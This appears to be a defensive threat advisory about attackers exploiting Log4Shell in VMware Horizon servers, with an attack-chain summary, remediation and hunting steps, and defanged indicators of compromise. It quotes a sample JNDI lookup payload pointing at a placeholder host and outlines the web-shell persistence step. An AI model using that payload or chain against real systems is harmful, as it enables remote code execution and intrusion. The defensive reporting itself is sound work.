Severity: High
Initial Access Broker (IAB) group Prophet Spider and an unknown threat group are actively attempting to exploit the Log4j vulnerability in VMware Horizon.
Attack Chain:
• In ongoing threat campaigns, the attackers attempt to initiate the attack via Log4Shell payload similar to ${jndi:ldap://example.com} targeting vulnerable VMware Horizon servers.
• The attack exploits the Log4Shell vulnerability in the Apache Tomcat service, which is embedded within VMware Horizon, resulting in the Horizon server calling back over LDAP protocol and loading malicious Java class.
• The malicious Java class attempts to exploit the ws_TomcatService.exe process to spawn either cmd.exe or powershell.exe as child processes, further injecting a web shell to absg-worker.js.
• The ‘VMBLastSG’ service is forcibly restarted to initiate the listener using Blast Secure Gateway for any IP address on port 8443.
• This enables an attacker to establish a stealthy persistence method.
• Post exploitation, the threat actors use encoded PowerShell commands to download a second-stage payload (such as Cobalt Strike beacons, Crypto miner or ransomware) to the victim systems.
The hackers behind the attack intend to use the attack to establish persistent communication with a command and control server that could then be used to carry out other malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.
REMEDIATION
1. Block the threat indicators at their respective controls.
2. Ensure Microsoft Windows Workstations, Microsoft Exchange Server and Microsoft IIS Server are updated with the latest security patches.
3. Ensure to patch Log4j to 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).
4. Ensure VMware Horizon servers are updated with the latest security patches.
5. Ensure Domain Accounts follows the least privilege principle and ensure Two-Factor authentication is enabled on all Business Email Accounts.
6. Ensure VPN client software and VPN servers are patched with the latest security updates released by the vendor.
7. Keep all systems and software updated to the latest patched versions.
8. Set PowerShell execution policy to execute only signed scripts. The change in policy on a system may be a way to detect malicious use of PowerShell.
9. Hunt for any evidence of ws_TomcatService.exe spawning abnormal processes; any powershell.exe processes containing ‘VMBlastSG’ in the
command line; File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ (NOTE: This file is generally overwritten during upgrades, and not modified).
10. Use the PowerShell command to detect malicious file modification activity.
11. Use Microsoft Defender for Endpoint query to detect abnormal child processes spawned by ws_TomcatService.exe
12. Use Microsoft Defender for Endpoint query to detect powershell.exe processes with ‘VMBlastSG’ in the command line.
13. Educate employees about phishing attacks and use effective email filtering techniques from external sources.
URL’s
| hxxp[:]//149.28.200[.]140[:]443/wget.bin | hxxp[:]//137.184.17[.]252[:]443/dd.ps1 |
| hxxp[:]//lurchmath[.]org/wordpress-temp/wp-content/plugins/xmrig.zip | hxxp[:]//101.79.1[.]118/2.ps1 |
| hxxp[:]//72.46.52[.]135/mad_micky.bat | hxxp[:]//72.46.52[.]135/kill.bat |
| hxxp[:]//api.rogerscorp[.]org[:]80 | hxxp[:]//139.180.217[.]203[:]443/mac.ini |
| hxxp[:]//80.71.158[.]96/xms.ps1 | hxxp[:]//139.180.217[.]203[:]443/mac.tmp |
| hxxp[:]//149.28.200[.]140[:]443/winntaa.exe | hxxp[:]//139.180.217[.]203[:]443/tna.conf |
| hxxp[:]//185.112.83[.]116[:]8080/drv | hxxp[:]//139.180.217[.]203[:]443/LockDown.dll |
IP’s
| 138.68.246[.]18 | 185.220.100[.]240 | 185.220.101[.]190 | 23.129.64[.]218 |
| 140.246.171[.]141 | 185.220.100[.]241 | 185.220.101[.]36 | 23.236.146[.]162 |
| 149.28.200[.]140 | 185.220.100[.]244 | 185.220.101[.]53 | 45.146.165[.]168 |
| 150.158.189[.]96 | 185.220.100[.]251 | 185.220.102[.]248 | 45.154.255[.]147 |
| 159.65.48[.]154 | 185.220.100[.]252 | 185.56.80[.]65 | 45.61.146[.]242 |
| 167.114.114[.]169 | 185.220.101[.]152 | 192.160.102[.]170 | 5.157.38[.]50 |
| 167.71.13[.]196 | 185.220.101[.]158 | 194.48.199[.]78 | 51.222.121[.]180 |
| 170.210.45[.]163 | 185.220.101[.]171 | 198.23.214[.]117 | 51.79.175[.]139 |
| 175.6.210[.]66 | 185.220.101[.]184 | 198.98.56[.]151 | 62.102.148[.]68 |
| 185.112.83[.]116 | 185.220.101[.]188 | 216.144.180[.]171 | 72.46.52[.]135 |
| 79.172.212[.]132 | 80.71.158[.]96 | 101.79.1[.]118 | 87.121.52[.]221 |
| 146.59.130[.]58 |
DOMAINS
b.oracleservice[.]top
api.rogerscorp[.]org
FILE PATHS
c:\windows\system32\config\systemprofile\mimu\nssm.exe
c:\windows\system32\config\systemprofile\mimu2\nssm.exe
C:\Windows\system32\config\systemprofile\mimu\xmrig.exe
c:\windows\temp\winntaa.exe
C:\Windows\temp\wget.bin
C:\Windows\system32\config\systemprofile\AppData\Roaming\network02.exe
C:\Windows\TEMP\network02.exe
REFERENCES
• Log4U, Shell4Me
• Log4Shell Vulnerabilities in VMware Horizon Targeted to Install Web Shells
• LOG4J EXPLOIT HITS AGAIN: VULNERABLE VMWARE HORIZON SERVERS AT RISK
• Initial Access Broker Involved in Log4Shell Attacks Against VMware Horizon Servers
• Active Exploitation of VMware Horizon Servers
Nandeesha Basavaraj is a key member of the MDR Threat Intelligence team at Network Intelligence. He has experience in both SOC and Threat Intelligence. He is passionate about investigating cyber threats, threat actors’ motives, targets, attack behaviours and does threat hunting in his spare time. Apart from the work field, he enjoys playing cricket and badminton.